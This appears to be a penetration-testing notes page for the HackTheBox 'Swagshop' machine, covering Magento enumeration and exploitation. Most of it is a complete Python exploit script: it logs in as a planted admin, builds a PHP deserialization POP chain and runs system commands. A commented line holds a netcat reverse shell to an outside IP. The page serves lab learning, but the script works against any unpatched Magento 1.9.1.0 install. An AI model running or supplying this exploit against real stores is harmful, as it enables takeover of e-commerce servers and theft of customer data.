Magento

Magento is an ecommerce website which allows users to create and showcase their products

Enumeration

  • The magescan is an automated tool which is like wpscan checks for basic config locations - here

php magescan.phar scan:all http://swagshop.htb

Exploits

  • When the magento is not patched with SUPEE-5344 and of the version 1.9.1.0 CE / 1.14.1.0 EE (which will be enumerated by megascan)

  • We can perform remote code execution

searchsploit -x 37977

  • The exploit creates a admin account in the megento application which we can use it to perform RCE as authenticated user

searchsploit -x 37811

  • The python3 version of 37811 is below and worked fine for swagshop htb

#!/usr/bin/env python3

from hashlib import md5
import sys 
import re
import base64
import requests
from pwn import log

username = "forme"
password = "forme"
url = "http://swagshop.htb/index.php/admin"
proxy = {"http" :"http://localhost:8080"}
data = {"login[username]" : username,
		"login[password]" : password}

#arg = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f'
arg = "whoami"
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# session
log.info("Initializing the session")
session = requests.Session()

# Loign Successful
r = session.post(url=url, data=data, proxies=proxy)
if r.status_code == 200:
	log.success("Logged in as admin...")
else:
	log.error("Failed to login")

burl = re.search("ajaxBlockUrl = \'(.*)\'", r.text)
burl = burl.group(1)
# print(burl) # identifies block url and key
key = re.search("var FORM_KEY = '(.*)'", r.text)
key = key.group(1)
# print(key)
log.info("Identified block url and key")

dn = session.get(burl + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", dn.text)
tunnel = bytes(tunnel.group(1), 'utf-8')

payload = base64.b64encode(bytes(payload, 'utf-8'))
gh = bytes(md5(payload + install_date).hexdigest(), 'utf-8')
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh
log.info("Exploit constructed")
test_ = exploit.decode()
test = session.get(url=test_)
log.success("Successfully exploited...")
print(test.text)

Machine:

  • Swagshop - HTB

PreviousWordpressNextBludit

Last updated